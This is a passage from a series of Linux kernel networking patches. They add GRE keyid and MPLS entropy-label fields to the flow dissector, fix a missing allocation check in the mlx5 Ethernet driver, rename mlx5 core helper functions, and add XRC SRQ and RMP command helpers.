FLOW_DISSECTOR_KEY_FLOW_LABEL)) { + key_tags = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_FLOW_LABEL, + target_container); + key_tags->flow_label = ntohl(flow_label); } - - return true; } break; @@ -659,6 +646,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_VLANID, .offset = offsetof(struct flow_keys, tags), }, + { + .key_id = FLOW_DISSECTOR_KEY_FLOW_LABEL, + .offset = offsetof(struct flow_keys, tags), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From 1fdd512c92003cf2d671ba22753d13302bf8cd1d Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:45 -0700 Subject: [PATCH 705/872] net: Add GRE keyid in flow_keys In flow dissector if a GRE header contains a keyid this is saved in the new keyid field of flow_keys. The GRE keyid is then represented in the flow hash function input. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 6 ++++++ net/core/flow_dissector.c | 24 +++++++++++++++++++++++- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 14d8483d836e..6c5e8d262607 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -32,6 +32,10 @@ struct flow_dissector_key_tags { flow_label:20; }; +struct flow_dissector_key_keyid { + __be32 keyid; +}; + /** * struct flow_dissector_key_ipv4_addrs: * @src: source ip address @@ -113,6 +117,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ + FLOW_DISSECTOR_KEY_GRE_KEYID, /* struct flow_dissector_key_keyid */ FLOW_DISSECTOR_KEY_MAX, }; @@ -150,6 +155,7 @@ struct flow_keys { #define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; struct flow_dissector_key_tags tags; + struct flow_dissector_key_keyid keyid; struct flow_dissector_key_ports ports; struct flow_dissector_key_addrs addrs; }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 70f0567b6be9..7ddc0a7b3da5 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -127,6 +127,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; struct flow_dissector_key_tags *key_tags; + struct flow_dissector_key_keyid *key_keyid; u8 ip_proto; if (!data) { @@ -315,8 +316,25 @@ bool __skb_flow_dissect(const struct sk_buff *skb, nhoff += 4; if (hdr->flags & GRE_CSUM) nhoff += 4; - if (hdr->flags & GRE_KEY) + if (hdr->flags & GRE_KEY) { + const __be32 *keyid; + __be32 _keyid; + + keyid = __skb_header_pointer(skb, nhoff, sizeof(_keyid), + data, hlen, &_keyid); + + if (!keyid) + return false; + + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_GRE_KEYID)) { + key_keyid = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_GRE_KEYID, + target_container); + key_keyid->keyid = *keyid; + } nhoff += 4; + } if (hdr->flags & GRE_SEQ) nhoff += 4; if (proto == htons(ETH_P_TEB)) { @@ -650,6 +668,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_FLOW_LABEL, .offset = offsetof(struct flow_keys, tags), }, + { + .key_id = FLOW_DISSECTOR_KEY_GRE_KEYID, + .offset = offsetof(struct flow_keys, keyid), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From b3baa0fbd02a1a9d493d8cb92ae4a4491b9e9d13 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:46 -0700 Subject: [PATCH 706/872] mpls: Add MPLS entropy label in flow_keys In flow dissector if an MPLS header contains an entropy label this is saved in the new keyid field of flow_keys. The entropy label is then represented in the flow hash function input. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/net/flow_dissector.h | 1 + net/core/flow_dissector.c | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 6c5e8d262607..1a8c22419936 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -118,6 +118,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_GRE_KEYID, /* struct flow_dissector_key_keyid */ + FLOW_DISSECTOR_KEY_MPLS_ENTROPY, /* struct flow_dissector_key_keyid */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 7ddc0a7b3da5..77e22e4fc898 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -15,6 +15,7 @@ #include #include #include +#include #include #include @@ -288,6 +289,37 @@ bool __skb_flow_dissect(const struct sk_buff *skb, } return true; } + + case htons(ETH_P_MPLS_UC): + case htons(ETH_P_MPLS_MC): { + struct mpls_label *hdr, _hdr[2]; +mpls: + hdr = __skb_header_pointer(skb, nhoff, sizeof(_hdr), data, + hlen, &_hdr); + if (!hdr) + return false; + + if ((ntohl(hdr[0].entry) & MPLS_LS_LABEL_MASK) == + MPLS_LABEL_ENTROPY) { + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_MPLS_ENTROPY)) { + key_keyid = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_MPLS_ENTROPY, + target_container); + key_keyid->keyid = hdr[1].entry & + htonl(MPLS_LS_LABEL_MASK); + } + + key_basic->n_proto = proto; + key_basic->ip_proto = ip_proto; + key_control->thoff = (u16)nhoff; + + return true; + } + + return true; + } + case htons(ETH_P_FCOE): key_control->thoff = (u16)(nhoff + FCOE_HEADER_LEN); /* fall through */ @@ -357,6 +389,9 @@ bool __skb_flow_dissect(const struct sk_buff *skb, case IPPROTO_IPV6: proto = htons(ETH_P_IPV6); goto ipv6; + case IPPROTO_MPLS: + proto = htons(ETH_P_MPLS_UC); + goto mpls; default: break; } From 5e24851ec502334986c2ac775beb4b7184a0b6c5 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 4 Jun 2015 19:30:36 +0300 Subject: [PATCH 707/872] net/mlx5_en: Add missing check for memory allocation failure The patch afb736e9330a: "net/mlx5: Ethernet resource handling files" from May 28, 2015, leads to the following static checker warning: drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c:726 mlx5e_create_main_flow_table() error: potential null dereference 'g'. (kcalloc returns null) Fixes: afb736e9330a ("net/mlx5: Ethernet resource handling files") Reported-by: Dan Carpenter Signed-off-by: Amir Vadai Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c index 6feebda4b3e4..120db80c47aa 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c @@ -722,6 +722,8 @@ static int mlx5e_create_main_flow_table(struct mlx5e_priv *priv) u8 *dmac; g = kcalloc(9, sizeof(*g), GFP_KERNEL); + if (!g) + return -ENOMEM; g[0].log_sz = 2; g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; From 7db22ffb5b09d9b77baf057ca034d966e58df1e1 Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:37 +0300 Subject: [PATCH 708/872] net/mlx5_core: Apply proper name convention to helpers Some core helper functions were named with mlx5_ only prefix, fix that to mlx5_core_ so we're aligned with the overall scheme used for core services. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/en_main.c | 20 ++++++++-------- .../ethernet/mellanox/mlx5/core/transobj.c | 22 +++++++++-------- .../ethernet/mellanox/mlx5/core/transobj.h | 24 +++++++++++-------- 3 files changed, 36 insertions(+), 30 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index eee829d119f9..1b592913d4d7 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -367,7 +367,7 @@ static int mlx5e_enable_rq(struct mlx5e_rq *rq, struct mlx5e_rq_param *param) mlx5_fill_page_array(&rq->wq_ctrl.buf, (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); - err = mlx5_create_rq(mdev, in, inlen, &rq->rqn); + err = mlx5_core_create_rq(mdev, in, inlen, &rq->rqn); kvfree(in); @@ -395,7 +395,7 @@ static int mlx5e_modify_rq(struct mlx5e_rq *rq, int curr_state, int next_state) MLX5_SET(modify_rq_in, in, rq_state, curr_state); MLX5_SET(rqc, rqc, state, next_state); - err = mlx5_modify_rq(mdev, rq->rqn, in, inlen); + err = mlx5_core_modify_rq(mdev, rq->rqn, in, inlen); kvfree(in); @@ -408,7 +408,7 @@ static void mlx5e_disable_rq(struct mlx5e_rq *rq) struct mlx5e_priv *priv = c->priv; struct mlx5_core_dev *mdev = priv->mdev; - mlx5_destroy_rq(mdev, rq->rqn); + mlx5_core_destroy_rq(mdev, rq->rqn); } static int mlx5e_wait_for_min_rx_wqes(struct mlx5e_rq *rq) @@ -596,7 +596,7 @@ static int mlx5e_enable_sq(struct mlx5e_sq *sq, struct mlx5e_sq_param *param) mlx5_fill_page_array(&sq->wq_ctrl.buf, (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); - err = mlx5_create_sq(mdev, in, inlen, &sq->sqn); + err = mlx5_core_create_sq(mdev, in, inlen, &sq->sqn); kvfree(in); @@ -624,7 +624,7 @@ static int mlx5e_modify_sq(struct mlx5e_sq *sq, int curr_state, int next_state) MLX5_SET(modify_sq_in, in, sq_state, curr_state); MLX5_SET(sqc, sqc, state, next_state); - err = mlx5_modify_sq(mdev, sq->sqn, in, inlen); + err = mlx5_core_modify_sq(mdev, sq->sqn, in, inlen); kvfree(in); @@ -637,7 +637,7 @@ static void mlx5e_disable_sq(struct mlx5e_sq *sq) struct mlx5e_priv *priv = c->priv; struct mlx5_core_dev *mdev = priv->mdev; - mlx5_destroy_sq(mdev, sq->sqn); + mlx5_core_destroy_sq(mdev, sq->sqn); } static int mlx5e_open_sq(struct mlx5e_channel *c, @@ -1115,12 +1115,12 @@ static int mlx5e_open_tis(struct mlx5e_priv *priv, int tc) MLX5_SET(tisc, tisc, prio, tc); - return mlx5_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); + return mlx5_core_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); } static void mlx5e_close_tis(struct mlx5e_priv *priv, int tc) { - mlx5_destroy_tis(priv->mdev, priv->tisn[tc]); + mlx5_core_destroy_tis(priv->mdev, priv->tisn[tc]); } static int mlx5e_open_tises(struct mlx5e_priv *priv) @@ -1326,7 +1326,7 @@ static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) mlx5e_build_tir_ctx(priv, tirc, tt); - err = mlx5_create_tir(mdev, in, inlen, &priv->tirn[tt]); + err = mlx5_core_create_tir(mdev, in, inlen, &priv->tirn[tt]); kvfree(in); @@ -1335,7 +1335,7 @@ static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) static void mlx5e_close_tir(struct mlx5e_priv *priv, int tt) { - mlx5_destroy_tir(priv->mdev, priv->tirn[tt]); + mlx5_core_destroy_tir(priv->mdev, priv->tirn[tt]); } static int mlx5e_open_tirs(struct mlx5e_priv *priv) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c index 3c555d708af1..d918816ac4d8 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -34,7 +34,7 @@ #include "mlx5_core.h" #include "transobj.h" -int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) +int mlx5_core_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) { u32 out[MLX5_ST_SZ_DW(create_rq_out)]; int err; @@ -49,7 +49,7 @@ int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) return err; } -int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) +int mlx5_core_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) { u32 out[MLX5_ST_SZ_DW(modify_rq_out)]; @@ -60,7 +60,7 @@ int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); } -void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) +void mlx5_core_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) { u32 in[MLX5_ST_SZ_DW(destroy_rq_in)]; u32 out[MLX5_ST_SZ_DW(destroy_rq_out)]; @@ -73,7 +73,7 @@ void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) +int mlx5_core_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) { u32 out[MLX5_ST_SZ_DW(create_sq_out)]; int err; @@ -88,7 +88,7 @@ int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) return err; } -int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) +int mlx5_core_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) { u32 out[MLX5_ST_SZ_DW(modify_sq_out)]; @@ -99,7 +99,7 @@ int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); } -void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) +void mlx5_core_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) { u32 in[MLX5_ST_SZ_DW(destroy_sq_in)]; u32 out[MLX5_ST_SZ_DW(destroy_sq_out)]; @@ -112,7 +112,8 @@ void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) +int mlx5_core_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tirn) { u32 out[MLX5_ST_SZ_DW(create_tir_out)]; int err; @@ -127,7 +128,7 @@ int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) return err; } -void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) +void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) { u32 in[MLX5_ST_SZ_DW(destroy_tir_out)]; u32 out[MLX5_ST_SZ_DW(destroy_tir_out)]; @@ -140,7 +141,8 @@ void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) +int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tisn) { u32 out[MLX5_ST_SZ_DW(create_tis_out)]; int err; @@ -155,7 +157,7 @@ int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) return err; } -void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) +void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) { u32 in[MLX5_ST_SZ_DW(destroy_tis_out)]; u32 out[MLX5_ST_SZ_DW(destroy_tis_out)]; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h index 1bc898cc4933..b71d77f61a1d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -33,15 +33,19 @@ #ifndef __TRANSOBJ_H__ #define __TRANSOBJ_H__ -int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn); -int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); -void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); -int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn); -int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); -void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); -int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn); -void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); -int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); -void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); +int mlx5_core_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rqn); +int mlx5_core_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); +void mlx5_core_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); +int mlx5_core_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *sqn); +int mlx5_core_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); +void mlx5_core_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); +int mlx5_core_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tirn); +void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); +int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tisn); +void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); #endif /* __TRANSOBJ_H__ */ From 01949d0109ee5fae33752f0db99a36f1619e1873 Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:38 +0300 Subject: [PATCH 709/872] net/mlx5_core: Enable XRCs and SRQs when using ISSI > 0 When working in ISSI > 0 mode, the model exposed by the device for XRCs and SRQs is different. XRCs use XRC SRQs and plain SRQs are based on RPM (Receive Memory Pool). Add helper functions to create, modify, query, and arm XRC SRQs and RMPs. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/srq.c | 2 +- .../net/ethernet/mellanox/mlx5/core/Makefile | 4 +- drivers/net/ethernet/mellanox/mlx5/core/srq.c | 444 +++++++++++++++--- .../ethernet/mellanox/mlx5/core/transobj.c | 154 ++++++ .../ethernet/mellanox/mlx5/core/transobj.h | 11 + include/linux/mlx5/driver.h | 6 +- include/linux/mlx5/mlx5_ifc.h | 16 +- 7 files changed, 564 insertions(+), 73 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index e8e8e942fa4a..e008505e96e9 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -302,7 +302,7 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, in->ctx.pd = cpu_to_be32(to_mpd(pd)->pdn); in->ctx.db_record = cpu_to_be64(srq->db.dma); - err = mlx5_core_create_srq(dev->mdev, &srq->msrq, in, inlen); + err = mlx5_core_create_srq(dev->mdev, &srq->msrq, in, inlen, is_xrc); kvfree(in); if (err) { mlx5_ib_dbg(dev, "create SRQ failed, err %d\n", err); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 87e9e606596a..07540f732df1 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -2,7 +2,7 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ - mad.o -mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o transobj.o \ + mad.o transobj.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o \ en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/srq.c b/drivers/net/ethernet/mellanox/mlx5/core/srq.c index f9d25dcd03c1..c48f504ccbeb 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/srq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/srq.c @@ -37,6 +37,7 @@ #include #include #include "mlx5_core.h" +#include "transobj.h" void mlx5_srq_event(struct mlx5_core_dev *dev, u32 srqn, int event_type) { @@ -62,6 +63,74 @@ void mlx5_srq_event(struct mlx5_core_dev *dev, u32 srqn, int event_type) complete(&srq->free); } +static int get_pas_size(void *srqc) +{ + u32 log_page_size = MLX5_GET(srqc, srqc, log_page_size) + 12; + u32 log_srq_size = MLX5_GET(srqc, srqc, log_srq_size); + u32 log_rq_stride = MLX5_GET(srqc, srqc, log_rq_stride); + u32 page_offset = MLX5_GET(srqc, srqc, page_offset); + u32 po_quanta = 1 << (log_page_size - 6); + u32 rq_sz = 1 << (log_srq_size + 4 + log_rq_stride); + u32 page_size = 1 << log_page_size; + u32 rq_sz_po = rq_sz + (page_offset * po_quanta); + u32 rq_num_pas = (rq_sz_po + page_size - 1) / page_size; + + return rq_num_pas * sizeof(u64); +} + +static void rmpc_srqc_reformat(void *srqc, void *rmpc, bool srqc_to_rmpc) +{ + void *wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + if (srqc_to_rmpc) { + switch (MLX5_GET(srqc, srqc, state)) { + case MLX5_SRQC_STATE_GOOD: + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + break; + case MLX5_SRQC_STATE_ERROR: + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_ERR); + break; + default: + pr_warn("%s: %d: Unknown srq state = 0x%x\n", __func__, + __LINE__, MLX5_GET(srqc, srqc, state)); + MLX5_SET(rmpc, rmpc, state, MLX5_GET(srqc, srqc, state)); + } + + MLX5_SET(wq, wq, wq_signature, MLX5_GET(srqc, srqc, wq_signature)); + MLX5_SET(wq, wq, log_wq_pg_sz, MLX5_GET(srqc, srqc, log_page_size)); + MLX5_SET(wq, wq, log_wq_stride, MLX5_GET(srqc, srqc, log_rq_stride) + 4); + MLX5_SET(wq, wq, log_wq_sz, MLX5_GET(srqc, srqc, log_srq_size)); + MLX5_SET(wq, wq, page_offset, MLX5_GET(srqc, srqc, page_offset)); + MLX5_SET(wq, wq, lwm, MLX5_GET(srqc, srqc, lwm)); + MLX5_SET(wq, wq, pd, MLX5_GET(srqc, srqc, pd)); + MLX5_SET64(wq, wq, dbr_addr, MLX5_GET64(srqc, srqc, dbr_addr)); + } else { + switch (MLX5_GET(rmpc, rmpc, state)) { + case MLX5_RMPC_STATE_RDY: + MLX5_SET(srqc, srqc, state, MLX5_SRQC_STATE_GOOD); + break; + case MLX5_RMPC_STATE_ERR: + MLX5_SET(srqc, srqc, state, MLX5_SRQC_STATE_ERROR); + break; + default: + pr_warn("%s: %d: Unknown rmp state = 0x%x\n", + __func__, __LINE__, + MLX5_GET(rmpc, rmpc, state)); + MLX5_SET(srqc, srqc, state, + MLX5_GET(rmpc, rmpc, state)); + } + + MLX5_SET(srqc, srqc, wq_signature, MLX5_GET(wq, wq, wq_signature)); + MLX5_SET(srqc, srqc, log_page_size, MLX5_GET(wq, wq, log_wq_pg_sz)); + MLX5_SET(srqc, srqc, log_rq_stride, MLX5_GET(wq, wq, log_wq_stride) - 4); + MLX5_SET(srqc, srqc, log_srq_size, MLX5_GET(wq, wq, log_wq_sz)); + MLX5_SET(srqc, srqc, page_offset, MLX5_GET(wq, wq, page_offset)); + MLX5_SET(srqc, srqc, lwm, MLX5_GET(wq, wq, lwm)); + MLX5_SET(srqc, srqc, pd, MLX5_GET(wq, wq, pd)); + MLX5_SET64(srqc, srqc, dbr_addr, MLX5_GET64(wq, wq, dbr_addr)); + } +} + struct mlx5_core_srq *mlx5_core_get_srq(struct mlx5_core_dev *dev, u32 srqn) { struct mlx5_srq_table *table = &dev->priv.srq_table; @@ -79,26 +148,311 @@ struct mlx5_core_srq *mlx5_core_get_srq(struct mlx5_core_dev *dev, u32 srqn) } EXPORT_SYMBOL(mlx5_core_get_srq); -int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, - struct mlx5_create_srq_mbox_in *in, int inlen) +static int create_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int inlen) { struct mlx5_create_srq_mbox_out out; - struct mlx5_srq_table *table = &dev->priv.srq_table; - struct mlx5_destroy_srq_mbox_in din; - struct mlx5_destroy_srq_mbox_out dout; int err; memset(&out, 0, sizeof(out)); + in->hdr.opcode = cpu_to_be16(MLX5_CMD_OP_CREATE_SRQ); - err = mlx5_cmd_exec(dev, in, inlen, &out, sizeof(out)); - if (err) - return err; - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); + err = mlx5_cmd_exec_check_status(dev, (u32 *)in, inlen, (u32 *)(&out), + sizeof(out)); srq->srqn = be32_to_cpu(out.srqn) & 0xffffff; + return err; +} + +static int destroy_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + struct mlx5_destroy_srq_mbox_in in; + struct mlx5_destroy_srq_mbox_out out; + + memset(&in, 0, sizeof(in)); + memset(&out, 0, sizeof(out)); + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); + in.srqn = cpu_to_be32(srq->srqn); + + return mlx5_cmd_exec_check_status(dev, (u32 *)(&in), sizeof(in), + (u32 *)(&out), sizeof(out)); +} + +static int arm_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + u16 lwm, int is_srq) +{ + struct mlx5_arm_srq_mbox_in in; + struct mlx5_arm_srq_mbox_out out; + + memset(&in, 0, sizeof(in)); + memset(&out, 0, sizeof(out)); + + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_ARM_RQ); + in.hdr.opmod = cpu_to_be16(!!is_srq); + in.srqn = cpu_to_be32(srq->srqn); + in.lwm = cpu_to_be16(lwm); + + return mlx5_cmd_exec_check_status(dev, (u32 *)(&in), + sizeof(in), (u32 *)(&out), + sizeof(out)); +} + +static int query_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + struct mlx5_query_srq_mbox_in in; + + memset(&in, 0, sizeof(in)); + + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_SRQ); + in.srqn = cpu_to_be32(srq->srqn); + + return mlx5_cmd_exec_check_status(dev, (u32 *)(&in), sizeof(in), + (u32 *)out, sizeof(*out)); +} + +static int create_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, + int srq_inlen) +{ + u32 create_out[MLX5_ST_SZ_DW(create_xrc_srq_out)]; + void *create_in; + void *srqc; + void *xrc_srqc; + void *pas; + int pas_size; + int inlen; + int err; + + srqc = MLX5_ADDR_OF(create_srq_in, in, srq_context_entry); + pas_size = get_pas_size(srqc); + inlen = MLX5_ST_SZ_BYTES(create_xrc_srq_in) + pas_size; + create_in = mlx5_vzalloc(inlen); + if (!create_in) + return -ENOMEM; + + xrc_srqc = MLX5_ADDR_OF(create_xrc_srq_in, create_in, + xrc_srq_context_entry); + pas = MLX5_ADDR_OF(create_xrc_srq_in, create_in, pas); + + memcpy(xrc_srqc, srqc, MLX5_ST_SZ_BYTES(srqc)); + memcpy(pas, in->pas, pas_size); + /* 0xffffff means we ask to work with cqe version 0 */ + MLX5_SET(xrc_srqc, xrc_srqc, user_index, 0xffffff); + MLX5_SET(create_xrc_srq_in, create_in, opcode, + MLX5_CMD_OP_CREATE_XRC_SRQ); + + memset(create_out, 0, sizeof(create_out)); + err = mlx5_cmd_exec_check_status(dev, create_in, inlen, create_out, + sizeof(create_out)); + if (err) + goto out; + + srq->srqn = MLX5_GET(create_xrc_srq_out, create_out, xrc_srqn); +out: + kvfree(create_in); + return err; +} + +static int destroy_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(destroy_xrc_srq_in)]; + u32 xrcsrq_out[MLX5_ST_SZ_DW(destroy_xrc_srq_out)]; + + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + memset(xrcsrq_out, 0, 